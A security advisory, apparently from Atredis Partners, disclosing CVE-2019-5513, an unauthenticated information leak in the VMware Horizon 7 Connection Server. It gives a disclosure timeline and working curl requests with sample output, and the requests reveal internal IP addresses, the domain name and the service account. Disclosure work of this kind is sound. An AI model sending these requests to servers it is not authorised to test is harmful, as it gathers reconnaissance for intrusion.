Information Disclosure
- VMWare
- VMWare Horizon 7
The VMWare Horizon Connection Server application exposes sensitive information to an unauthenticated attacker. The Connection Server is often allowed through an organization's firewall in order to support external access to the virtual desktop environment. The information disclosure issues allow an unauthenticated attacker to obtain the IP address, Windows domain name, and service account for the VMWare Horizon Connection Server.
No mitigations are available.
This vulnerability was found by HD Moore of Atredis Partners
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5513
- https://www.vmware.com/security/advisories/VMSA-2019-0003.html
- https://cwe.mitre.org/data/definitions/200.html
- 2018-12-12: Atredis Partners sent vulnerability details to VMWare
- 2018-12-12: VMWare acknowledges the report
- 2019-01-29: Atredis Partners sent vulnerability details to CERT/CC
- 2019-03-14: VMWare publishes VMSA-2019-0003
- 2019-03-15: Atredis Partners publishes this advisory
The VMWare Horizon Connection Server exposes sensitive information via the portal and broker endpoints of the web server.
The portal application leaks the internal IP address of the Connection Server along with any additional X-Forwarded-For headers via the URL /portal/info.jsp:
$ curl https://host/portal/info.jsp
{"acceptLanguage":"en-US","clientVersion":"4.9.0","logLevel":"2","clientIPAddress":"192.168.0.12, 192.168.30.45","contextPath":"/portal","feature":{},"os":"unknown","installerLink":"https://www.vmware.com/go/viewclients"}
The broker endpoint exposes the service account username and Active Directory domain name in the get-configuration response:
$ curl -k -s -XPOST -H 'Content-Type: text/xml' https://host/broker/xml --data-binary $'<?xml version=\'1.0\' encoding=\'UTF-8\'?><broker version=\'10.0\'><get-configuration></get-configuration></broker>'
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<broker version="14.0">
<configuration>
<result>ok</result>
<client-configuration>
<params>
<param>
<name>alwaysSendRdsLicense</name>
<values>
<value>true</value>
</values>
</param>
</params>
</client-configuration>
<authentication>
<screen>
<name>cert-auth</name>
<params>
<param>
<name>user</name>
<values>
<value/>
</values>
</param>
</params>
</screen>
</authentication>
<broker-guid>cc20d98a-8fd2-45ae-b805-9952db6ef6d2</broker-guid>
<broker-service-principal>
<type>kerberos</type>
<name>[email protected]</name>
</broker-service-principal>
</configuration>
</broker>